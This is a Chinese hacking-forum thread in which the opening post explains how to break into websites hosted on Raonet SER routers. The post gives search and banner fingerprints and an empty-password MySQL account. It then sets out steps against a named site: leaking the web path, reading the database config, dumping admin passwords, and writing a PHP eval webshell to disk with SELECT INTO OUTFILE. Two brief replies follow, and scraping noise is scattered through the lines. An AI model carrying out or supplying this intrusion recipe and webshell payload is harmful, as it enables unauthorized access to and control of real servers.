找回密码
 立即注册
查看: 3169|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:0 M/ {$ S8 F9 U% `' }' n& s( y& Y

" t, d3 ^  J5 E% H( [% K1:google搜索'Raonet Subscriber Ethernet Router'; P7 {' G2 v% m6 q5 Q2 g8 h
0 n& Y  A+ I2 R* t! u
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% w4 W+ M3 Z% Q! [+ x7 Q+ }1 R- o8 A4 D3 n+ o
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。9 k9 Y; o/ Z. Q/ [- T& Z2 i

: Z- `7 ~0 E8 k& u& D//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......& d( E  a3 P  P) l
! G+ p, r/ a8 k3 f: R9 l! n) b  j

& \7 U; s8 g/ y) C5 a) _$ v9 g! L# U; w9 Q% c1 i$ v
入侵步骤:
6 m5 Q- S5 m, f. t$ T. ^+ O% [9 B4 ]; T6 N+ g1 z4 J4 N3 J0 c, b" X
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php* _" Y5 ]& m" k4 `8 P/ W! ?
) @$ g6 M; B# d9 M
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc" w9 h5 b' o0 e& T4 @- @
3:得到密码后连接,查看GUI管理密码:
! Q) w; ~& g2 c8 }" T+ w$ ause ser_5000 P% w& \) ?0 _5 z# @, D
select id,passwd from user;
: S, u& |1 }! m8 A# X" `4:通过数据库写入webshell,执行命令:0 V8 X/ H" Z4 I! j/ c. f
use mysql;
0 Z( |' I9 u! O7 Z0 \$ O4 B( o$ Qcreate table ok(cmd TEXT);
+ I+ m5 }7 o8 U# x' ]+ binsert into ok values("<?php @eval($_POST[cmd])?>");& i- M3 p" O1 L( a" T4 W
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
+ [; U/ T/ [1 }* e- V5 }: F5 mdrop table ok;
' [- K6 L$ b9 g" O5 g1 h& b0 J, X5 V1 R5 G- n' d$ K4 a7 V' j1 t; @
5:连接后门shell.php
% j/ U$ b1 S) ^% h5 r' }* I* Z, |  _* x0 _1 f8 I% y8 D
6. 搞定!/ a4 }/ v" a! w3 ]/ ^5 \3 N
4 b9 \0 F7 h6 S& q
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表